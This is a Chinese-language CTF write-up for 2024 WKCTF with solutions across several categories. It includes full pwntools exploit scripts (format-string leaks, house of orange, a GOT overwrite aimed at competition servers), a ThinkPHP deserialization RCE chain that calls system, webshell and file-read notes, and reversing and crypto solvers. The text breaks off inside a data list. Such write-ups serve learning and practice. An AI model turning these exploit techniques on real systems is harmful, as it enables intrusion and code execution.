2024年WKCTF-wp

题目下载地址：https://github.com/0xviol1t/CTF-challenges/tree/main/2024/WKCTF

PWN

baby_stack

wait中存在格式化字符串漏洞，随便测一下发现输入6的时候会输出一个libc上的地址从而得到基址，通过libc基址获取one gadget地址

void __fastcall wait()
{
  unsigned int num; // eax
  char s[5]; // [rsp+Bh] [rbp-85h] BYREF
  char format[120]; // [rsp+10h] [rbp-80h] BYREF

  puts("Press enter to continue");
  getc(stdin);
  printf("Pick a number: ");
  fgets(s, 5, stdin);
  num = strtol(s, 0LL, 10);
  snprintf(format, 0x64uLL, "Your magic number is: %%%d$llx\n", num);
  printf(format);
  introduce();
}

echo_inner中存在栈上的off-by-null，在栈上布置rop并且通过输入长度控制将\x00写到rbp，返回到上层函数之后就会抬栈运行到布置的rop，为了确保执行到ogg需要将最后8位覆盖成ogg，前面全部覆盖成ret

void __fastcall echo_inner(_BYTE *a1, int size)
{
  a1[(int)fread(a1, 1uLL, size, stdin)] = 0;
  puts("You said:");
  printf("%s", a1);
}

exp

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

#context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('110.40.35.73', 33688)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

r.sendafter(b'continue', b'\n')
r.sendlineafter(b'number', b'6')

r.recvuntil(b'is: ')
libc_base = int(r.recvuntil(b'\n')[:-1], 16) - 0x3ec7e3
libc = ELF('./2.27/libc-2.27.so')

one = [0x4f2a5, 0x4f302, 0x10a2fc]
ogg = one[1] + libc_base
ret = 0x00000000000008aa + libc_base

r.sendlineafter(b'256)? ', b'256')
p = p64(ret) * 31 + p64(ogg)
r.sendline(p)

r.interactive()

easy_heap

漏洞点出在edit可以堆溢出

unsigned __int64 edit()
{
  int index; // [rsp+0h] [rbp-10h] BYREF
  _DWORD size[3]; // [rsp+4h] [rbp-Ch] BYREF

  *(_QWORD *)&size[1] = __readfsqword(0x28u);
  index = 0;
  size[0] = 0;
  puts("Index :");
  __isoc99_scanf("%d", &index);
  puts("Size :");
  __isoc99_scanf("%d", size);
  if ( size[0] > 0x1000u )
  {
    puts("too large");
    exit(0);
  }
  puts("Content :");
  read(0, chunk_ptr[index], size[0]);
  return __readfsqword(0x28u) ^ *(_QWORD *)&size[1];
}

没有delete且限制了show的长度为一个地址，首先想到的就是house of orange

伪造top chunk的条件：

保证原本old top chunk的size大于MINSIZE
保证原本old top chunk的prev_inuse位是1
原本old top chunk的地址加上其size之后的地址要与页对齐也就是address & 0xfff = 0x000
old chunk的size要小于申请的堆块大小加上MINSIZE

当申请的堆大小大于伪造的top chunk大小时会将top chunk释放，释放的大小为top chunk size - 0x20，并且根据释放的大小判断进入fastbin或者unsorted bin

所以本题可以先释放一次top chunk到unsorted bin泄露libc，再释放一次top chunk到fastbin进行fastbin attack

exp

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

#context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('110.40.35.73', 33747)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def add(size, content):
    r.sendlineafter(b'>', b'1')
    r.sendlineafter(b'Size', str(size))
    r.sendafter(b'Content', content)

def edit(index, size, content):
    r.sendlineafter(b'>', b'2')
    r.sendlineafter(b'Index', str(index))
    r.sendlineafter(b'Size', str(size))
    r.sendafter(b'Content', content)

def show(index):
    r.sendlineafter(b'>', b'3')
    r.sendlineafter(b'Index', str(index))

add(0xdf8, b'a')
add(0x18, b'a')

p = b'a' * 0x18 + p64(0x1e1)
edit(1, len(p), p)

add(0xdf8, b'a')
add(0x1b8, b'a')

show(3)
libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b"\x00")) - 0x3c4b61
libc = ELF('./2.23/libc-2.23.so')

one = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
ogg = libc_base + one[3]
malloc_hook = libc_base + libc.sym['__malloc_hook']

add(0x18, b'a')
p = b'a' * 0x18 + p64(0x1e1)
edit(4, len(p), p)

add(0x148, b'a')
add(0xdf8, b'a')

p = b'a' * 0x148 + p64(0x71) + p64(malloc_hook - 0x23)
edit(5, len(p), p)

add(0x68, b'a')
add(0x68, b'a' * 19 + p64(ogg))

r.sendlineafter(b'>', b'1')
r.sendlineafter(b'Size', str(0))

r.interactive()

something_changed

漏洞点是格式化字符串，并且存在后门，限制了输入内容不能包含$，但还是可以直接用fmtstr_payload工具

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v4; // x19
  int i; // [xsp+FCCh] [xbp+2Ch]
  char v6[40]; // [xsp+FD0h] [xbp+30h] BYREF
  __int64 v7; // [xsp+FF8h] [xbp+58h]

  v7 = _bss_start;
  read(0, v6, 0x50uLL);
  for ( i = 0; ; ++i )
  {
    v4 = i;
    if ( v4 >= strlen(v6) )
      break;
    if ( (char *)(unsigned __int8)v6[i] == "$" )
      return 0;
  }
  printf(v6);
  return 0;
}

测试出偏移是14，开了canary保护，所以可以将__stack_chk_fail_got改成backdoor

1
2
3

sudo qemu-aarch64 -L ./libc/libc/lib ./pwn        
aaaaaaaa-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p
aaaaaaaa-0x7f3e313a1400-0x2d70252d70252d70-0xa7025-0x7f3e313a1448-(nil)-0x8080808080-0x2c6f242c6f242c6f-0x7f3e313a13e0-0x7f3e30a48a00-0x400888-0x4008c0-0x7f3e313a13e0-0x4b30a489ac-0x6161616161616161-0x252d70252d70252d-0x2d70252d70252d70-0x70252d70252d7025-0x252d70252d70252d-0x2d70252d70252d70-0x70252d70252d7025-0x252d70252d70252d-0x2d70252d70252d70

exp

from pwn import *

context(arch='aarch64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

#context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('120.79.91.95', 3332)
else:
    r = process(["qemu-aarch64", "-g", "1234", "./pwn"])

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

p = fmtstr_payload(14, {0x411018:0x400770}, write_size='short')
r.send(p)

r.interactive()

WEB

ez_tp

GET参数s

内网ip地址: 10.40.35.73

<?php
namespace think{
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        function __construct($obj = ''){
            $this->lazySave = True;
            $this->data = ['whoami' => ['dir']];
            $this->exists = True;
            $this->table = $obj;
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami',['whoami']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
    }
}

namespace{
    echo(base64_encode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}

ez_php

http://110.40.35.73:81/favicon.webp存在AKSK泄露: "ba260cf0-2e6b-4a0e-91c1-d52b8c3214a1"

文件上传拿到webshell密码：shell

蚁剑直连

qiandao

1	url?file=/flag

MISC

https://github.com/htr-tech/0xTwin/blob/master/twin_cipher.py

解码得到base64编码的图片，图片是一个二维码但是扫不出来，找在线工具https://cli.im/deqr/other得到：**请发送 WKCTF2024 到微信公众号隐雾安全获取flag！**

照做得到flagWKCTF{hello_2024}

不套是你的谎言

DES解密+字典爆破 GPT脚本

from Crypto.Cipher import DES  # 导入DES加密模块

from binascii import a2b_hex  # 导入十六进制转字节串的函数

import os, sys  # 导入操作系统和系统模块，用于文件操作和系统级交互

# 定义DES解密函数

def des_decrypt(data, key):

    cipher = DES.new(key, DES.MODE_ECB)  # 使用ECB模式初始化DES对象

    return cipher.decrypt(data)  # 返回解密后的数据

# 待解密的十六进制数据

data_h = '5270263d56386adfaf9c18f360eefe4dd151d9f0dbc51b3e8c2ee5d64be8853d19c6b3c2f014cc6c'

data = a2b_hex(data_h)  # 将十六进制数据转换为字节串

# 读取密码列表文件

f = open(os.getcwd() + "\\password_list.txt", 'r')  # 打开密码列表文件

l = f.read().split('\\n')  # 读取文件内容并按行分割

f.close()  # 关闭文件

# 遍历密码列表

for x in l:

    x = x.encode()  # 将密码从字符串转换为字节串

    if len(x) < 8:  # 如果密码长度不足8字节

        x += b'\\x00' * (8 - len(x))  # 补齐至8字节，使用空字节填充

    if len(x) == 8:  # 确认密码长度为8字节

        decrypted_data = des_decrypt(data, x)  # 使用密码解密数据

        if b'{' in decrypted_data and b'}' in decrypted_data and (b'C' in decrypted_data or b'c' in decrypted_data):

            try:

                # 打印密码和解密后的数据（假设解密后的数据为可打印的字符串）

                print(x.decode(), decrypted_data.decode())

            except UnicodeDecodeError:

                # 如果解密后的数据不可打印，则跳过本次循环

                pass

REVERSE

so_easy

主要函数

__int64 __fastcall Java_com_so_easy_MainActivity_soEasy(__int64 a1, __int64 a2, __int64 a3)
{
  unsigned int v5; // r13d
  const char *v6; // rax
  const char *v7; // r12
  size_t v8; // rax
  size_t v9; // r8
  __int64 v10; // rsi
  int v11; // edx
  __int64 v12; // rdi
  __int64 v13; // rsi
  __int64 v14; // rdi
  __int64 v15; // rcx
  size_t v16; // rax
  size_t v17; // rcx
  unsigned __int8 v18; // di
  __int128 v20[6]; // [rsp+0h] [rbp-98h] BYREF
  int v21; // [rsp+60h] [rbp-38h]
  unsigned __int64 v22; // [rsp+68h] [rbp-30h]

  v22 = __readfsqword(0x28u);
  v5 = 0;
  v6 = (const char *)(*(__int64 (__fastcall **)(__int64, __int64, _QWORD))(*(_QWORD *)a1 + 1352LL))(a1, a3, 0LL);
  v7 = v6;
  memset(v20, 0, sizeof(v20));
  v21 = 0;
  if ( *v6 )
  {
    v8 = strlen(v6);
    v9 = 0LL;
    do
    {
      v10 = *(_QWORD *)&v7[v9];
      v11 = 255;
      do
      {
        v12 = (2 * v10) ^ 0x71234EA7D92996F5LL; // 对输入字符串的每个8字节块进行多次位运算:
        if ( v10 >= 0 )
          v12 = 2 * v10;
        v13 = (2 * v12) ^ 0x71234EA7D92996F5LL;
        if ( v12 >= 0 )
          v13 = 2 * v12;
        v14 = (2 * v13) ^ 0x71234EA7D92996F5LL;
        if ( v13 >= 0 )
          v14 = 2 * v13;
        v15 = (2 * v14) ^ 0x71234EA7D92996F5LL;
        if ( v14 >= 0 )
          v15 = 2 * v14;
        v10 = (2 * v15) ^ 0x71234EA7D92996F5LL;
        if ( v15 >= 0 )
          v10 = 2 * v15;
        v11 -= 5;
      }
      while ( v11 );
      *(_QWORD *)((char *)v20 + v9) = v10;
      v9 += 8LL;
    }
    while ( v8 > v9 );
  }
  if ( *v7 )
  {
    v16 = strlen(v7);
    v17 = 0LL;
    LOBYTE(v5) = 0;
    do
    {
      v18 = v5 + (*(_WORD *)((char *)v20 + v17) == *(_WORD *)((char *)&unk_560 + v17));
      v17 += 2LL;
      v5 = v18;
    }
    while ( v16 > v17 );
  }
  (*(void (__fastcall **)(__int64, __int64, const char *))(*(_QWORD *)a1 + 1360LL))(a1, a3, v7);
  return v5;
}

多次位分析最后和unk_560比较

unk_560[] =
{
  0xAE, 0x81, 0xBA, 0xC1, 0xF0, 0x95, 0x0A, 0x54, 0x14, 0x03, 
  0x4A, 0xE2, 0x52, 0x4E, 0x84, 0xF8, 0xC9, 0x3E, 0x14, 0x98, 
  0x8F, 0x98, 0xFD, 0x09, 0x5E, 0xAD, 0x05, 0xB4, 0x01, 0x0F, 
  0xC0, 0x3F
};

exp

# 倒序板子
def main():
    arr = "AE81BAC1F0950A5414"  # 定义字符串
    length = len(arr)  # 获取字符串长度

    # 使用for循环反向打印字符串的前半部分
    for i in range(length // 2):
        print(arr[length - 2 * i - 2], end='')  # 打印字符，并使用空字符串''作为分隔符
        print(arr[length - 2 * i - 1], end='')

    print()  # 打印换行符

# 调用主函数
if __name__ == "__main__":
    main()
    
 # CRC32板子
secret = [0x540A95F0C1BA81AE,0xF8844E52E24A0314,0x9FD988F98143EC9,0x3FC00F01B405AD5E]
key = 0x71234EA7D92996F5
flag = ""

for s in secret:
    for i in range(255):
        sign = s & 1  
        if sign == 1:
            s ^= key
        s //= 2
        # 防止负值除2，溢出为正值
        if sign == 1:
            s |= 0x8000000000000000  
    j = 0
    while j < 8:
        flag += chr(s & 0xFF) 
        s >>= 8
        j += 1
print(flag)

quite_easy

目测是一个TLS

花指令去掉了

如下

.text:                 nop
.text:00407C83                 nop
.text:00407C84                 nop
.text:00407C85                 nop
.text:00407C86                 nop
.text:00407C87                 nop
.text:00407C88                 nop
.text:00407C89                 nop
.text:00407C8A                 nop
.text:00407C8B                 nop
.text:00407C8C                 nop
.text:00407C8D                 nop
.text:00407C8E                 nop
.text:00407C8F                 nop
.text:00407C90                 nop
基于rand的一个简单加密 
int __cdecl sub_40A5A0(char *Str, int a2)
{
  int v2; // eax
  char v3; // al
  char v4; // si
  char v5; // si
  char v6; // di
  _BYTE *v7; // eax
  char v8; // si
  char v9; // si
  char v10; // di
  _BYTE *v11; // eax
  const char *v12; // eax
  _BYTE *v14; // [esp+10h] [ebp-158h]
  int v15; // [esp+18h] [ebp-150h]
  int m; // [esp+E4h] [ebp-84h]
  int k; // [esp+F0h] [ebp-78h]
  int j; // [esp+FCh] [ebp-6Ch]
  int i; // [esp+108h] [ebp-60h]
  char v20[36]; // [esp+114h] [ebp-54h] BYREF
  char v21[32]; // [esp+138h] [ebp-30h] BYREF
  int v22; // [esp+164h] [ebp-4h]

  __CheckForDebuggerJustMyCode(&unk_41A036);
  sub_40111D(Str);
  v22 = 1;
  sub_40111D(&::Str);
  v2 = sub_401663(v21);
  srand(v2 + 89);
  for ( i = 0; i < 16; ++i )
  {
    v3 = rand();
    sub_4013E3(v3);
  }
  if ( sub_401663(v21) != 48 )
    exit(99);
  for ( j = 0; j < 16; ++j )
  {
    v4 = *sub_4010DC(j);
    v5 = *sub_4010DC(j + 32) ^ v4;
    v6 = *sub_4010DC(j);
    v7 = sub_4010DC(j + 32);
    sub_4013E3(~(*v7 & v6) & v5);
  }
  for ( k = 16; k < 32; ++k )
  {
    v8 = *sub_4010DC(k);
    v9 = *sub_4010DC(k - 16) ^ v8;
    v10 = *sub_4010DC(k);
    v11 = sub_4010DC(k - 16);
    sub_4013E3(~(*v11 & v10) & v9);
  }
  for ( m = 0; m < 32; ++m )
  {
    v14 = sub_4010DC(m);
    *v14 -= *(m + a2);
  }
  sub_401460();
  v12 = sub_4014E7(v20);
  v15 = strcmp(v12, Str2);
  LOBYTE(v22) = 0;
  sub_401357(v20);
  v22 = -1;
  sub_401357(v21);
  return v15;
}

考点基本就是antidebug动静结合得到加密流程

rand得到ke后前16个与其异或后16个和前16个异或进行

exp

#include <stdlib.h> // For srand() and rand()
#include <stdio.h>

int main() {
    int ke[33] = {0};
	int temp[16];
    for(int k = 0; k < 255; k++) {
        srand(k + 89);
        for(int i = 0; i < 16; ++i) {
            ke[i] = rand() & 0xff;

        }

        char flag[33] = "flag{ed1d665e6516a37ab09f0b7a40}";

        int data[33] = {0x80, 0xD3, 0x6F, 0xFF, 0x15, 0x03, 0x98, 0x8C, 0xB4, 0x5B,
                         0x96, 0xC0, 0x59, 0xAC, 0x18, 0xDF, 0x2D, 0xCE, 0x3F, 0xFB,
                         0xC4, 0xED, 0xD8, 0xD2, 0xA8, 0x2D, 0xF8, 0x23, 0x9F, 0x22,
                         0x25, 0xCE};

        for(int i = 0; i < 32; i++) {
            data[i] += flag[i];
        }
        if((data[0] ^ ke[0]) == 87) {
 
            for(int i = 0; i < 16; i++) {

                int flag1 = (data[i] ^ ke[i % 16]) & 0xff;

                int flag2 = data[i+16]^flag1;
                printf("%c", flag1);
                printf("\\n2:%c", flag2);

            }
	}
        }

    
    return 0;

}

然后手动整理一下WKCTF{08898c40064d1fc4836db94fe}

AI

how_to_encrypt

问了下gpt得知encrypt的运行结果是ciphertext.txt，其中会用到flag和model.pth，直接扔给gpt，通过flag和model.pth求flag

import torch
import torch.nn as nn

# 读取 ciphertext.txt 中的内容并转换为张量
def read_ciphertext(file_path):
    with open(file_path, 'r') as f:
        lines = f.readlines()
    data = []
    for line in lines:
        data.append([float(x) for x in line.split()])
    return torch.tensor(data)

# 定义网络结构
class Net(nn.Module):
    def __init__(self, n):
        super(Net, self).__init__()
        self.linear = nn.Linear(n, n * n)
        self.conv = nn.Conv2d(1, 1, (2, 2), stride=1, padding=1)

    def forward(self, x):
        x = self.linear(x)
        x = x.view(1, 1, n, n)
        x = self.conv(x)
        return x

# 加载 ciphertext.txt 和 model.pth
ciphertext = read_ciphertext('ciphertext.txt')
n = int(ciphertext.shape[-1])  # 假设最后一维是 n
ciphertext = ciphertext.view(1, 1, n, n)

# 确保n与保存的模型一致
n = 47  # 根据错误信息设置为47

# 初始化网络
mynet = Net(n)
mynet.load_state_dict(torch.load('model.pth'))

# 定义一个可优化的输入变量
flag_tensor = torch.randn(n, requires_grad=True, dtype=torch.float32)

# 优化器
optimizer = torch.optim.Adam([flag_tensor], lr=0.1)

# 目标输出
target_output = ciphertext

# 迭代优化输入
for epoch in range(10000):
    optimizer.zero_grad()
    output = mynet(flag_tensor)
    loss = nn.MSELoss()(output, target_output)
    loss.backward()
    optimizer.step()
    
    if epoch % 1000 == 0:
        print(f'Epoch {epoch}, Loss: {loss.item()}')

# 获取优化后的输入
optimized_flag = flag_tensor.detach().numpy()

# 将优化后的输入转换回字符
flag = ''.join([chr(int(round(x))) for x in optimized_flag])
print("Recovered flag:", flag)

CRYPTO

easy_random

先看给的2496个8位，python的随机数用的是mt19937,624个32位就能预测，回溯,8*4=32；2496/4=624。显而易见，可以操作。参考2020 pwnhub CoinFlip2得到state

state = [2922114156, 2886276701, 1168768544, 2339187170, 3551087255, 117510054, 4232565172, 1076139110, 3366831833, 1734453078, 4105913658, 1066792668, 2395352043, 785096749, 3707690263, 2430171307, 2064716469, 1119720065, 1112222395, 2136656989, 2232844740, 388978998, 1363102788, 67899517, 457789137, 3527002829, 1187847099, 1188611575, 3830294635, 3760337941, 297081839, 3230408812, 2906355860, 279725084, 3056220997, 1053068885, 3252084646, 2818726015, 3615795115, 2751222655, 74688614, 1452880497, 426221319, 1680367484, 4211465923, 908441837, 2290937869, 526329269, 3225608663, 350552485, 885538125, 3496826412, 3347875222, 2730243675, 1823616219, 1474037291, 2474670592, 1175091387, 1527449390, 2024565653, 2185945759, 902338428, 3571876882, 632524934, 1235569406, 3612682285, 2727233684, 2085380963, 1570339017, 3839696585, 1482742582, 646051896, 3804319832, 2113555238, 4150326517, 2606046640, 1454130831, 1919843931, 1018624146, 1956310311, 1162868231, 1118548906, 974692065, 3020424226, 2996838388, 1724936385, 1668410782, 3044755338, 3710133971, 1043581839, 362583150, 3880481779, 114234888, 1724135673, 1280834309, 2958310395, 3502226151, 620064160, 3244210820, 3839287479, 2283659292, 405764632, 29535149, 2759062778, 1662916252, 2374319319, 3359789079, 1896011543, 1991740933, 2041947596, 3393060496, 996086198, 193135800, 1184463268, 819767446, 410330102, 569788256, 3880255000, 340523190, 885031563, 2752345656, 4116368372, 1738848623, 1895472503, 85502529, 334873925, 3543996685, 3082948803, 3195880838, 1458851187, 2843458392, 20236078, 3136689072, 2121777470, 3543587943, 3590933177, 4057799526, 1241162800, 1014541188, 1031410742, 267989518, 92604561, 2190353015, 87786611, 435741463, 3800398555, 1860727248, 2608606593, 287619193, 768990059, 1686137462, 3255556540, 3234299857, 2087562050, 1575350832, 1982640551, 1476745138, 2757668599, 108958643, 337813164, 273001595, 3515727084, 2976758889, 2674818924, 2133197017, 3709052669, 1992118633, 2421927781, 174599786, 3608298365, 1708985493, 3925831183, 3063611093, 3852984733, 540242111, 1623482619, 1874921843, 1317809124, 2774735715, 3828180102, 1997343223, 1516869708, 941992323, 307089973, 368181535, 163007409, 596938343, 1686397275, 52708329, 230996593, 3597201983, 378926364, 3618422671, 2062721049, 3659976071, 546629459, 3976307656, 1509609055, 3677736141, 1613243397, 1378877471, 531534610, 2602178644, 4099876535, 1394187732, 1706260244, 1842911215, 3381571710, 456693813, 1667668257, 792813840, 4044011316, 1391972141, 1677638507, 1467741933, 2542725716, 3261642613, 1122181516, 1726857655, 2765884383, 2563231823, 1890137479, 3462591813, 290505918, 3480784421, 4146013364, 906268950, 1460571462, 625398701, 1868955581, 2562420879, 3524561573, 2480663847, 424010572, 3760440358, 506451740, 2616205788, 3835513223, 2698078113, 933669512, 2259175222, 1766445936, 3062774434, 3383207496, 165724374, 717679250, 872303977, 1054921507, 1640987195, 2398705310, 744526846, 2142916476, 3769314780, 3643489144, 906983325, 1001096018, 1522376663, 3516789445, 425379249, 1807654888, 1584889396, 996500676, 2138028000, 1877118731, 2780715755, 56317932, 994780643, 231703463, 1590924826, 449553992, 1970334362, 3631415563, 2378887069, 2645995105, 604040985, 766274135, 2897107084, 3122401328, 604584226, 3514594183, 3159592392, 539086862, 1966827756, 1548312674, 2223920152, 4193868755, 2604831097, 2301554299, 2919432501, 3445772747, 221908018, 1919849944, 1707243688, 1311680342, 1132835813, 824121832, 2623654824, 4245764621, 1669541543, 793028119, 1400611299, 2330555992, 1295319061, 2376883177, 3054784982, 1534527889, 3381065612, 431181624, 2520679460, 1612115175, 3417053178, 3202101207, 4112825474, 209873225, 3982289256, 3175605361, 1007754107, 1533969733, 3657972615, 1233249703, 1775877579, 2812100730, 3215107528, 1781386145, 3025989255, 3066346118, 3283795978, 1197222174, 2936543382, 3503535134, 2892598771, 2621962168, 931511531, 2231087188, 4146539078, 4002087507, 2491835423, 4060649251, 4048333160, 2444738719, 2691519303, 1556526141, 3615497232, 4050826531, 500299044, 717467546, 2206683369, 861398548, 3151369905, 4029791836, 3416545629, 4120104600, 1465267912, 483234533, 3035820989, 3832933168, 3568690105, 96174302, 2545526712, 1102861924, 1074783639, 4182941480, 1533353222, 1488829617, 1503690984, 185887778, 4211993208, 2290188486, 1146083769, 2041769341, 2684027677, 3176900642, 1387338494, 946259368, 1066487432, 795876682, 3861793354, 1668825820, 216618949, 2896083408, 3851619025, 442276681, 206355214, 270139248, 347366931, 1910792165, 3953458832, 2734158556, 2811136264, 1920172269, 1837836373, 3778467275, 3779230355, 3897121172, 2344011383, 1146522764, 2190434845, 609244986, 2013714652, 560173192, 2402932255, 1072869170, 1770725561, 952360909, 1412825165, 3696544236, 2306376326, 2830983153, 207976619, 4155556879, 3728896627, 2654370117, 3334033001, 1365410137, 1493856098, 1253593280, 1631830970, 5803336, 3918597809, 86127041, 333464839, 3604499396, 149662371, 2129288705, 1461710188, 3760680120, 3729872359, 2100765881, 3535556758, 444301423, 2716178967, 1126522126, 4087265377, 129975151, 3676574817, 946781552, 1144144314, 4160587561, 3992786314, 45372372, 2839307265, 3121990915, 2417091275, 2394722122, 2336989436, 3126674182, 3231554964, 3785353831, 3066121066, 4059908701, 3257600631, 3304564137, 976977941, 2994176851, 3509885563, 436168092, 2194926470, 572263581, 2964578564, 2577729800, 4257414592, 1074783671, 2629434251, 42822614, 1475322010, 3068645543, 3694724738, 3480058324, 4204711804, 3168448984, 2767935672, 3016152818, 4134435775, 2141315517, 2182008981, 2871864678, 2294299758, 1409773258, 3418660825, 3090287076, 3241139267, 2315623533, 2157788904, 334169841, 2062298350, 4075844652, 1672438569, 2994084656, 2204498767, 2430183901, 4179388667, 317027997, 2894184457, 3635887387, 1307832846, 3358657065, 734371454, 610520453, 3421706671, 3240587498, 3690351924, 935152653, 2737123774, 203357945, 1027962332, 3777141639, 743025036, 4046422672, 1085389282, 110265143, 320421926, 1931570193, 936595461, 2927488848, 2265674314, 3444945553, 786566925, 4133145648, 2879270131, 4165751769, 3985446237, 1971125873, 3724681025, 2661325531, 2441664181, 3290805620, 2459158763, 2102811157, 2881160687, 1153639082, 827213914, 3028527431, 2205345684, 3556675715, 1279123065, 4253124398, 3483559979, 4068430995, 4141206587, 2571521727, 2944439402, 443124686, 2268164570, 2235451426, 3679071975, 3129207272, 2516367556, 1468462786, 1881517367, 3491042253, 2913831047, 3164481275, 202602034, 3150723817, 1533130707, 1912730441, 2090267514, 3558123575, 1133228007, 3421482977, 2553693497, 3421969717, 2520271965, 2067324870, 1223636150, 2714495378, 3773685424, 2961634881, 88882886, 408668635, 904339271, 3187997208, 2883270961, 1911371885, 1111177434, 3677904221, 1424566197, 456428662, 3160502725, 2571618126, 1931038165, 1229862345, 885692642, 928907436, 281108918, 2025639202, 4098934983, 245166619, 3978368942, 2335134348, 2663736265, 3483476476, 1019177183, 1076843627, 2150626843, 3549898506, 497411044, 2948681730, 1293862520, 3364439483, 200913955, 876046583, 2810673955, 2828391839, 1905062360, 3783182365, 2472665728, 1439731349, 2736703148, 3316496080, 2996051367, 448455111, 3808598160, 2313472828, 1619655346, 1198200314, 3744504057, 1680713197, 2474661491, 3214410863, 1662774943, 3537885099, 3365412658, 3583677483]

再到GitHub里看这篇https://github.com/NonupleBroken/ExtendMT19937Predictor可以预测和回溯得到`data`，学习下面`randbytes`函数，写代码得到`key`，解`aes`即可

![Untitled (C:/Users/Lenovo/Desktop/viol1t战队WP/Untitled (3).png)](viol1t战队WP/Untitled (3).png)

from Crypto.Cipher import AES
from extend_mt19937_predictor import ExtendMT19937Predictor

predictor = ExtendMT19937Predictor()
data = [3086615663, 3771906507, 1933791567, 874400704, 4000928288, 1101512046, 3757205682, 895930285, 2975657910, 1590250704, 227397937, 3163700038, 1702493296, 86408336, 1317214060, 355017934, 4281601498, 2958424486, 3248821687, 1977038961, 75767861, 1848107476, 1201089736, 1669521311, 3079560731, 753259725, 2783047520, 1792692953, 1335325755, 4118154638, 221587457, 3931660158, 2105971738, 205787269, 3306213190, 3047766446, 757659831, 70863674, 2054184739, 418281550, 2654142751, 3195128907, 3920550815, 273337573, 856860348, 2332777112, 1144893468, 4097373151, 2348453877, 3391728911, 1909111864, 1167657184, 1690201897, 3037596190, 2683689827, 2591985588, 483396539, 583852871, 4213595783, 3297463098, 3940471284, 3167491933, 3836764654, 385184073, 4089593895, 2435556034, 2689611721, 3009515703, 2557788155, 742759035, 2911234764, 2747466359, 1658388676, 77325257, 1282826102, 833518584, 258773596, 1252680510, 2161330425, 1505524757, 1106189058, 2479195181, 4059279758, 4087261637, 2802856115, 215936888, 385734300, 3976823712, 2155716808, 166878602, 2958581226, 2153643018, 3459229793, 166654981, 1135752470, 2999716815, 102870168, 3592405002, 143561712, 3332529987, 3320611547, 176304087, 3809410875, 956905158, 3283895217, 1267764884, 1781613649, 2648889013, 4023857409, 2805378741, 2649655508, 2608225929, 2196639843, 2844902511, 1947381383, 133311662, 3189375534, 3360781939, 2598704112, 449730728, 1660136746, 2120362421, 4282918442, 553031705, 2359175283, 1820194402, 3326941501, 2079373053, 3848840564, 674418166, 2099289575, 3503720323, 71654499, 1153326313, 560391397, 987219237, 3519108661, 343772283, 2206155982, 1710469128, 4284016382, 1099544658, 2385903806, 435889661, 1754514095, 1654595795, 2611465271, 2924309399, 3849122741, 2771388572, 132443906, 639488960, 1702455392, 1197499823, 3431742381, 1162507747, 1956793904, 2882150352, 1024607141, 573195509, 4026654414, 2622992078, 3350586931, 3799382718, 189653578, 2030853706, 2360599919, 1447670146, 3029293260, 449492231, 794537698, 2013929440, 2521582617, 3662902133, 2988382934, 1101429406, 2204422539, 2884223003, 4160719615, 378925199, 321253023, 713869660, 1722066591, 4190495614, 3241838993, 3156104799, 3976107465, 690141471, 2565083608, 629627271, 3367902606, 3025623735, 1771459709, 2325207656, 29331249, 1631496960, 1272596234, 677116176, 36223230, 1894006200, 1868323656, 147662067, 3018282350, 847618418, 473803624, 303813116, 1222076488, 2857631548, 1620440323, 3028453586, 3771115277, 974948581, 2805463577, 3012869721, 1677541868, 873746956, 3206333732, 3540196648, 4222297189, 3955666095, 3723668809, 3383181896, 1572023031, 3593767211, 4139994756, 2493637240, 1055398974, 3491895839, 2158774748, 4074778554, 2265454243, 3123246270, 3737495019, 3584208536, 505004504, 711346815, 2265659930, 44813444, 762261590, 2345302575, 3635851795, 2255282129, 3598634106, 921749760, 1418440684, 3784150188, 2393915660, 2720478000, 1612782044, 4147046015, 2561634247, 586916363, 1606384598, 1299844033, 4047608483, 3431257347, 781242816, 3127114595, 1484369015, 483654543, 678493767, 2757899632, 3276695749, 1363370762, 1578035875, 555054787, 3093962781, 2222987767, 2130200534, 2053306276, 3948690640, 3249023873, 2343777324, 2833997966, 44199340, 1950451402, 1448991312, 1055067146, 3980624341, 1812874122, 2512418377, 3541037815, 714180005, 987816438, 3414079245, 1619142872, 4122595525, 3638144912, 3337941608, 2664929972, 1577036940, 206102296, 2850863132, 3729200403, 644729416, 844182047, 2261919397, 1040614315, 1776485562, 677708826, 223842114, 2591956969, 3141458682, 4271489476, 4253854271, 3973860423, 2805984925, 2908508806, 2328769351, 3865140, 4170270812, 1373888554, 1702101960, 3761095439, 3848481069, 812779025, 2073985983, 239315333, 1585392927, 2233774162, 2308108952, 3393306946, 2891660426, 1059096016, 2448311649, 2662483261, 422228248, 2356192519, 4004741305, 432651290, 2419877069, 3136967672, 329338548, 510605497, 2753410852, 2256462380, 3602678268, 2558451886, 324326056, 3822050324, 944965241, 4107093336, 1023337388, 564298141, 2977064774, 1802025909, 2329346614, 1460784428, 2510641562, 593994802, 4034614216, 4154528137, 3061249939, 487067285, 2856327155, 1909407614, 1782934804, 947220403, 2311402749, 